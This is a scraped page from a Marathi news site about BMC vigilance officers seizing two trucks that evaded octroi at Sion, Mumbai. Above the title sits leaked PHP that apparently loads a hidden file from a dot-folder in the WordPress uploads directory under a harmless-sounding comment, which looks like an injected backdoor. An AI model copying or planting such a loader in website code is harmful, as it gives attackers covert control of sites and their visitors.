add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबई – सायन येथे जकात चोरीचा भांडा फोड – SOCH INDIA
Menu

मुंबई – सायन येथे जकात चोरीचा भांडा फोड

मुंबई – सायन येथे आज सकाळी ७ वाजेच्या सुमारास सोच इंडिया टी.वी. न्यूज चे पत्रकार सुलतान अहमद ( क्राईम रिपोर्टर ) व संजय दांडेकर (क्राईम रिपोर्टर) B.M.C. चे विजीलीन्स ऑफिसर टीम सोबत जकात चोरी करून जाणारी दोन ट्रक पकडण्यात आले आहे. सदर ट्रक नंबर MH – 48 – AG 2285 व MH – 48 – AG – 2286 यात कापड असून हे ट्रक दहिसर जकात नाका येथून विना जकात भरता मुंबईच्या दिशेने काढण्यात आले.
या ट्रका बद्दलची माहिती मिळताच त्वरित या बाबतची सूचना B.M.C. विजीलीन्स टीम व कंट्रोला देण्यात आली . दिलेल्या माहितीवर कारवाई करण्यासाठी B.M.C. विजीलीन्स टीम ( श्री बडेकर – A.S.O. ची टीम / श्री कैलाश मिलके – S.I. / श्री सुनिल जाधव – O.I./ श्री गणेश कोचरेकर – S.G. / श्री प्रविण राणे – S.G. / Driver – श्री येरूनकर – MH- 01 – SA – 305.) सोबत घेऊन हे दोन्ही ट्रक सायन हॉस्पिटल येथे ताब्यात घेण्यात आले व भायखळा यार्डात जमा करण्यात आले आहे .
येत्या काही दिवसात यात जकात चोरीच्या मालाची योग्य प्रकारे मोज मापणी करून त्यावर लागणारा दंड वसूल केला जाईल व हे ट्रक जकात चोरी करून मुंबईत कसे आले या बाबतची चौकशी सुरु आहे यात दोषी असणाऱ्यावर योग्य ती कारवाई करण्यात येणार आहे.
अशा प्रकारची लाखो रुपयांची जकात चोरी हि जकात नाक्यावरील जकात दलालांकडून करण्यात येते यावर आला घालण्यासाठी B.M.C. ( A.N.C) बी. जी. पवार याच्यांकडे विशेष निवेदन करण्यात आले आहे.